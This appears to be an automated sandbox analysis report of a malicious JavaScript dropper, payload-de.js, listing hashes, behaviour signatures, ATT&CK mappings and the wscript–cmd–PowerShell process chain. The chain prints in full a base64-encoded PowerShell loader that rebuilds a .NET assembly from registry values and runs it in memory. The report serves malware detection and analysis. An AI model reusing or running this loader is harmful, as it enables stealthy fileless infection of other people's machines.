4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45

General

Target

payload-de.js
Size

2.8MB
MD5

6f1069a90a63748bdb3098301993b38b
SHA1

547d848aa7044051ac69c4004069d03b38a25c15
SHA256

4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45
SHA512

ccf12209455b03ed526c7d05f49463f7532daaec294e861724173de05433d031e9a12f4ca82f05e10ddc50322fa8db76fd5853591f6a80c03ec2a27595185434

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1760 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1760 powershell.exe
1760 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1760 powershell.exe

pid	process
1760	powershell.exe

pid	process
1760	powershell.exe
1760	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1760	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

wscript.execmd.exe

description	pid	process	target process
PID 1908 wrote to memory of 1092	1908	wscript.exe	cmd.exe
PID 1908 wrote to memory of 1092	1908	wscript.exe	cmd.exe
PID 1908 wrote to memory of 1092	1908	wscript.exe	cmd.exe
PID 1092 wrote to memory of 1760	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 1760	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 1760	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 1760	1092	cmd.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1092-2-0x0000000000000000-mapping.dmp

Download
memory/1760-10-0x0000000001E92000-0x0000000001E93000-memory.dmp

Filesize
4KB

Download
memory/1760-11-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/1760-5-0x0000000076271000-0x0000000076273000-memory.dmp

Filesize
8KB

Download
memory/1760-6-0x00000000740D0000-0x00000000747BE000-memory.dmp

Filesize
6.9MB

Download
memory/1760-7-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

Filesize
4KB

Download
memory/1760-8-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/1760-4-0x0000000000000000-mapping.dmp

Download
memory/1760-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1760-9-0x0000000001E90000-0x0000000001E91000-memory.dmp

Filesize
4KB

Download
memory/1760-12-0x0000000002950000-0x0000000002951000-memory.dmp

Filesize
4KB

Download
memory/1760-15-0x00000000060D0000-0x00000000060D1000-memory.dmp

Filesize
4KB

Download
memory/1760-20-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/1760-21-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/1760-28-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/1908-3-0x0000000002F30000-0x0000000002F34000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing